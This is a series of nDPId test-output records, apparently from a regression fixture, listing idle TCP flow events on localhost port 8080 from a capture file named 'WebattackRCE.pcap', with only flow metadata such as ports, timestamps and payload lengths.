-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277510,"flow_last_seen":1576420277510,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277512,"flow_last_seen":1576420277512,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277513,"flow_last_seen":1576420277513,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277515,"flow_last_seen":1576420277515,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277516,"flow_last_seen":1576420277516,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277518,"flow_last_seen":1576420277518,"flow_idle_time":7440000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277519,"flow_last_seen":1576420277519,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277520,"flow_last_seen":1576420277520,"flow_idle_time":7440000,"flow_min_l4_payload_len":152,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":152,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277522,"flow_last_seen":1576420277522,"flow_idle_time":7440000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277525,"flow_last_seen":1576420277525,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277526,"flow_last_seen":1576420277526,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277527,"flow_last_seen":1576420277527,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277528,"flow_last_seen":1576420277528,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277534,"flow_last_seen":1576420277534,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277535,"flow_last_seen":1576420277535,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277536,"flow_last_seen":1576420277536,"flow_idle_time":7440000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277537,"flow_last_seen":1576420277537,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277538,"flow_last_seen":1576420277538,"flow_idle_time":7440000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277540,"flow_last_seen":1576420277540,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277543,"flow_last_seen":1576420277543,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277544,"flow_last_seen":1576420277544,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277546,"flow_last_seen":1576420277546,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277547,"flow_last_seen":1576420277547,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277549,"flow_last_seen":1576420277549,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277550,"flow_last_seen":1576420277550,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277552,"flow_last_seen":1576420277552,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277553,"flow_last_seen":1576420277553,"flow_idle_time":7440000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277554,"flow_last_seen":1576420277554,"flow_idle_time":7440000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277556,"flow_last_seen":1576420277556,"flow_idle_time":7440000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277558,"flow_last_seen":1576420277558,"flow_idle_time":7440000,"flow_min_l4_payload_len":204,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":204,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277560,"flow_last_seen":1576420277560,"flow_idle_time":7440000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":206,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277561,"flow_last_seen":1576420277561,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277562,"flow_last_seen":1576420277562,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277564,"flow_last_seen":1576420277564,"flow_idle_time":7440000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277565,"flow_last_seen":1576420277565,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277566,"flow_last_seen":1576420277566,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277567,"flow_last_seen":1576420277567,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277568,"flow_last_seen":1576420277568,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277570,"flow_last_seen":1576420277570,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277572,"flow_last_seen":1576420277572,"flow_idle_time":7440000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277574,"flow_last_seen":1576420277574,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277575,"flow_last_seen":1576420277575,"flow_idle_time":7440000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277577,"flow_last_seen":1576420277577,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277578,"flow_last_seen":1576420277578,"flow_idle_time":7440000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277580,"flow_last_seen":1576420277580,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277581,"flow_last_seen":1576420277581,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277583,"flow_last_seen":1576420277583,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 